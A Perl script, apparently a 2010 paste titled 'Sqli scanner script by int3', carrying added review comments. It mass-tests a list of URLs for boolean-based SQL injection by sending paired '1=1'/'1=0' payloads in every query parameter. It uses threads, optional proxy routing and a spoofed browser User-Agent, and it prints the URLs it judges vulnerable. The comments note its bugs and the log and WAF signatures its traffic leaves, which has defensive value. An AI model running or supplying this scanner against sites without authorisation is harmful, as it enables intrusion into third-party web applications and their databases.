
[Perl] Sqli scanner script by int3

a guest
Nov 9th, 2010
#sqli scanner script by int3
#open file, test all sites for sql injection
#usage: perl sqlscan.pl filename [-e ender] [-p proxy] [-t threads]
#support http proxy like -p localhost:8080
#-e optional, default end with --
#-p optional, default no proxy
#-t optional, default 10 threads
#filename is a text file listing one URL per line (see the read loop below)
#default no proxy and 10 threads
#
# How it works, as far as the code below shows: for every URL in the input
# file, each query-string parameter gets two sibling requests, one with
# "%20AND%201=1" and one with "%20AND%201=0" inserted after the value (both
# followed by $ender), sent with a fixed Firefox/2.0 User-Agent. The pair is
# flagged when the tag-stripped bodies differ. Those two traits — paired
# requests whose query strings differ only in 1=1/1=0, and the dated UA
# string — are what a web server log review or WAF rule would key on to
# recognise this scanner's traffic.
#
# NOTE(review): no `use strict` / `use warnings`; every variable in this
# script is a package global. Getopt::Std is loaded but never used — the
# switches are parsed by the hand-written state machine below. `Thread`
# (the old API) is loaded while the code calls `threads->create`; whether
# `threads` itself ends up loaded depends on what `Thread`/`threads::shared`
# pull in — TODO confirm on the target perl.

use LWP::UserAgent;
use Getopt::Std;
use Thread;
use threads::shared;

$maxthreads = 10; #max threads at a time
$filename = '';
$status = 0;      #parser state: 0 = expecting a switch or the filename,
                  #1/2/3 = the next word is the value for -p / -t / -e
$proxy = '';
$ender = '--';    #appended after every injected condition
for ($i = 0; $i < ($#ARGV+1); $i++) {
    $s = @ARGV[$i]; # NOTE(review): one-element slice; works, but `$ARGV[$i]` is the scalar form
    if ($status eq 1) {
        $proxy = 'http://' . $s . '/'; #proxy speicifed (host:port -> http://host:port/)
        $status = 0;
    }
    elsif ($status eq 2) {
        $maxthreads = $s; #threads specified (not validated as a number)
        $status = 0;
    }
    elsif ($status eq 3) {
        $ender = $s; #different ender
        $status = 0;
    }
    elsif ($s eq '-p') {
        $status = 1;
    }
    elsif ($s eq '-t') {
        $status = 2;
    }
    elsif ($s eq '-e') {
        $status = 3;
    }
    elsif ($s eq '-h') {
        # NOTE(review): prints usage but does not exit; parsing continues
        print "perl sqlscan.pl filename [-e ender] [-p proxy] [-t threads]\n";
    }
    elsif (substr($s, 0, 1) eq '-') {
        # NOTE(review): unknown switch is reported but not fatal
        print "Invalid switch, use -h for help\n";
    }
    else {
        $filename = $s; #last non-switch word wins
    }
}
# NOTE(review): two-argument open on a bareword handle with no error check.
# A filename beginning with '>', '<' or '|' is taken as a mode/pipe rather
# than a literal path, and an unreadable file silently yields an empty list.
open(list, $filename);
@sites; # no-op statement under no strict; @sites springs into existence on first push
# NOTE(review): `ne undef` is a string comparison against '', so besides EOF
# an empty line in the input also ends the read early.
while (($line = <list>) ne undef) {
    chomp($line);
    push(@sites, $line);
}
@match1; #URLs carrying the true condition (1=1), one per parameter
@match2; #URLs carrying the false condition (1=0); @match2[$i] pairs with @match1[$i]
for ($i = 0; $i <= $#sites; $i++) {
    $_ = @sites[$i];
    /([^\?]*)\?([^\?]*)/; #match for url base: $1 = up to the first '?', $2 = query string
    # NOTE(review): the match result is not checked; on a URL without '?'
    # the captures keep whatever the previous successful match left in them.
    $base = $1; #base of url
    $dyn = $2; #dynamic part
    $end = 0;
    $lastpos = 0;
    # Walk the query string one parameter at a time: $lastpos moves to each
    # '&' in turn (the search starts at $lastpos+1, so offset 1 on the first
    # pass) and finally to the end of the string.
    while ($end ne 1) {
        $lastpos = index($dyn, '&', $lastpos+1);
        if ($lastpos eq -1) {
            $lastpos = length($dyn);
            $end = 1;
        }
        $t = $dyn;
        substr($t, $lastpos, 0) = '%20AND%201=1' . $ender; #insert after the current parameter value
        push(@match1, $base . '?' . $t);
        $t = $dyn;
        substr($t, $lastpos, 0) = '%20AND%201=0' . $ender;
        push(@match2, $base . '?' . $t);
    }
}
my @exploit : shared; #0 if not exploit, 1 if exploit; indexed like @match1, written by the workers
my $threads : shared = 0; #number of threads running
# NOTE(review): $threads is incremented/decremented inside the workers
# without lock(), and the worker counts itself only once it is running, so
# the limit check below is racy: several threads can be created before the
# first one has added itself to the count.
for ($i = 0; $i <= $#match1; $i++) {
    while (1) {
        if ($threads < $maxthreads) {
            my $thr = threads->create(\&check_site, $i, @match1[$i], @match2[$i]); #compare and check if possible sql exploit
            $thr->detach(); #detach from thread
            last; #next loop
        }
        else {
            sleep(1); #poll once a second until a worker slot frees up
        }
    }
}
# NOTE(review): if the last workers have not yet bumped $threads this loop
# exits at once and their results are never printed.
while ($threads > 0) {
    sleep(1); #wait until all threads terminate
}
# Report: print the 1=0 variant of every pair whose stripped pages differed.
for ($i = 0; $i <= $#exploit; $i++) {
    if (@exploit[$i] eq 1) {
        print @match2[$i] . "\n";
    }
}
exit(0);
  106.  
#check if site exploitable by: connect to sites, strip html, and compare (exploit if different)
#
# Worker body, one per threads->create() call.
#   $_[0]  index into @exploit (same index as @match1/@match2)
#   $_[1]  URL carrying the true condition (1=1)
#   $_[2]  URL carrying the false condition (1=0)
# Returns nothing; its only effects are writing @exploit[$_[0]] and
# adjusting the shared $threads counter. Reads the globals $proxy and
# (through the shared declarations) @exploit / $threads.
#
# NOTE(review): a difference between the two bodies is treated as proof of
# injection. Any response content that changes between requests — the
# second fetch failing, dynamic page elements — also differs and is
# reported as a hit, so output needs manual confirmation.
sub check_site {
    $page1, $page2; # no-op: neither declares nor initialises under no strict
    $threads++; #new thread create (no lock; see the counter note in the main loop)
    $ua = LWP::UserAgent->new;
    $ua->timeout(10); #10 s per request
    if ($proxy ne '') {
        $ua->proxy('http', $proxy); #only the http scheme is proxied
    }
    # Fixed, dated UA string — an easy log/WAF signature for this scanner.
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
    $response = $ua->get($_[1]); #get contents when sql result true
    # On a failed request $page1 stays undef and the comparison below sees ''.
    if ($response->is_success) {
        $page1 = $response->content;
    }
    # Second client built from scratch rather than reusing $ua (same settings).
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    if ($proxy ne '') {
        $ua->proxy('http', $proxy);
    }
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
    $response = $ua->get($_[2]); #get contents when sql result false
    if ($response->is_success) {
        $page2 = $response->content;
    }
    $page1 =~ s/<.+?>//g; #strip html (crude: no /s, so a tag spanning lines is kept)
    $page2 =~ s/<.+?>//g;
    # Both fetches failing gives '' eq '' -> "not exploit"; only one failing
    # gives a difference -> "exploit".
    if ($page1 eq $page2) {
        @exploit[$_[0]] = 0; #not exploit
    }
    else {
        @exploit[$_[0]] = 1; #exploit
    }
    $threads--; #thread close
}